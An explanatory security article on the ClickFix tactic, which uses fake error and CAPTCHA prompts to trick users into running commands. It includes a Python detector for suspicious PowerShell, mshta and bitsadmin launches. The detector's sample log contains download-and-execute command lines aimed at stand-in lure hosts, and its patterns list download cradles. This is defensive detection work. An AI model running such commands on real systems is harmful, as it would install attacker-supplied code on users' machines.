Introduction
A novel social engineering tactic termed ClickFix has emerged that uses deceptive error messages to trick users into executing harmful code themselves [1] [2]. First identified by Proofpoint in March 2024 [2], it has been adopted by threat groups such as APT28 and primarily targets popular video conferencing platforms like Google Meet and Zoom.
Description
ClickFix is a social engineering tactic that exploits deceptive error messages to trick users into executing harmful code [2]. First identified by Proofpoint in March 2024 [2], it has been adopted by threat groups such as APT28 and primarily targets popular video conferencing platforms like Google Meet and Zoom. The delivery method uses lures tailored to the distinct behaviors of Windows and macOS, encouraging users to run malicious PowerShell commands that allow cybercriminals to infect devices with a range of payloads, including the Amos Stealer for macOS [3].
On macOS, users who click a “fix it” prompt are walked through steps that download and install malware packaged as a .dmg [1] [2]. Windows infections, by contrast, follow two primary chains: one built on a malicious mshta command and the other on PowerShell commands [2]. The mshta chain runs a VBScript embedded in an HTML application (HTA), while the PowerShell chain relies on the user executing the command directly, for example through the Windows Run dialog, where the user pastes code that the lure page has already copied to the clipboard via JavaScript [2]. Both chains are dressed up as legitimate troubleshooting steps, which complicates detection [2]. Attackers exploit the trust users place in familiar interfaces and abuse legitimate Windows tools, a strategy known as “living off the land,” to bypass traditional security controls [3]. Tools such as bitsadmin.exe and mshta.exe are frequently abused in these attacks, which is why monitoring must be able to distinguish legitimate use of these binaries from malicious use [3].
ClickFix also makes use of GitHub and suspicious websites, where users are taken through redirection chains that end at fake CAPTCHA pages [2]. These pages deliver a simple PowerShell script that is hard to detect yet can have a significant impact. Effective detection of ClickFix therefore requires monitoring the specific processes involved and understanding these redirection chains [1]. The Sekoia TDR team is actively working to improve detection and mitigation strategies against this evolving threat [3]. The campaign underscores how sophisticated social engineering has become and why both users and organizations must remain vigilant to mitigate the associated risks [3].
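As an added example, not code from the cited articles or from the Sekoia TDR team, the following Python applies the detection idea from the two paragraphs above: it looks for PowerShell, mshta.exe and bitsadmin.exe started from a user-facing parent such as explorer.exe (which is the parent of anything launched from the Run dialog) with a command line that hides the window, encodes the command, evaluates downloaded text, or fetches a remote URL. It runs over a small set of constructed process-creation events in a flat key=value layout loosely modelled on Sysmon Event ID 1; the log format, the example.invalid hostnames, the indicator list and the alert threshold are all assumptions chosen for the example.

```python
import re
from dataclasses import dataclass

# Constructed sample events (values are made up). Programs started from the
# Run dialog (Win+R) or by double-click appear with explorer.exe as parent,
# which is the launch path a ClickFix lure steers the user into.
SAMPLE_LOG = r"""
ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine=powershell -w hidden -c iex (irm https://lure.example.invalid/fix.ps1)
ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\mshta.exe CommandLine=mshta https://lure.example.invalid/captcha.hta
ParentImage=C:\Windows\System32\cmd.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine=powershell -NoProfile -File C:\scripts\inventory.ps1
ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\notepad.exe CommandLine=notepad.exe readme.txt
ParentImage=C:\Windows\System32\svchost.exe Image=C:\Windows\System32\bitsadmin.exe CommandLine=bitsadmin /transfer patch https://updates.example.invalid/kb.msu C:\tmp\kb.msu
"""

LINE_RE = re.compile(r"^ParentImage=(\S+)\s+Image=(\S+)\s+CommandLine=(.*)$")

# Parents that mean "a human clicked or typed this" (assumed list).
USER_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
# Living-off-the-land binaries named in the article plus pwsh.exe.
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "bitsadmin.exe"}

# Command-line indicators; each match adds one point to the event's score.
PATTERNS = [
    (re.compile(r"-(?:w|win|window|windowstyle)\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(?:e|ec|enc|encodedcommand)\b", re.I), "encoded command"),
    (re.compile(r"\biex\b|invoke-expression", re.I), "invoke-expression"),
    (re.compile(r"https?://", re.I), "remote url"),
    (re.compile(r"\b(?:downloadstring|downloadfile|invoke-webrequest|irm|iwr)\b", re.I), "download cradle"),
    (re.compile(r"mshta(?:\.exe)?\s+https?://", re.I), "mshta remote hta"),
]


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_log(text):
    """Parse the flat key=value lines into ProcEvent records, skipping blanks."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append(ProcEvent(*m.groups()))
    return events


def score_event(ev):
    """Return the list of ClickFix indicators present in one event."""
    image = basename(ev.image)
    if image not in LOLBINS:
        return []
    reasons = []
    parent = basename(ev.parent_image)
    if parent in USER_PARENTS:
        reasons.append(f"{image} launched from {parent}")
    for pattern, label in PATTERNS:
        if pattern.search(ev.command_line):
            reasons.append(label)
    return reasons


def detect(events, threshold=3):
    """Return (event, reasons) pairs for events with at least `threshold` indicators."""
    hits = []
    for ev in events:
        reasons = score_event(ev)
        if len(reasons) >= threshold:
            hits.append((ev, reasons))
    return hits


if __name__ == "__main__":
    for ev, reasons in detect(parse_log(SAMPLE_LOG)):
        print(f"ALERT {basename(ev.image)}: {', '.join(reasons)}")
        print(f"      {ev.command_line}")
```

The scripted inventory run from cmd.exe and the bitsadmin transfer from a service scored below the threshold, which is the point of scoring several weak indicators together rather than alerting on any single LOLBin launch; in a real deployment the parent list, indicator weights and threshold would be tuned against the environment's own baseline.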
Conclusion
The emergence of ClickFix highlights the evolving sophistication of social engineering tactics, posing significant risks to users and organizations. Mitigating these threats requires robust monitoring systems, enhanced detection strategies, and increased vigilance. As cybercriminals continue to exploit familiar interfaces and legitimate tools, it is imperative for both users and organizations to stay informed and proactive in their cybersecurity measures to counteract these evolving threats.
References
[1] https://thenimblenerd.com/article/beware-the-clickfix-cybercriminals-new-trick-to-infect-your-devices-with-fake-error-messages/
[2] https://www.infosecurity-magazine.com/news/clickfix-fake-errors-malicious-code/
[3] https://gbhackers.com/clickfix-exploits-gmeet-zoom-pages/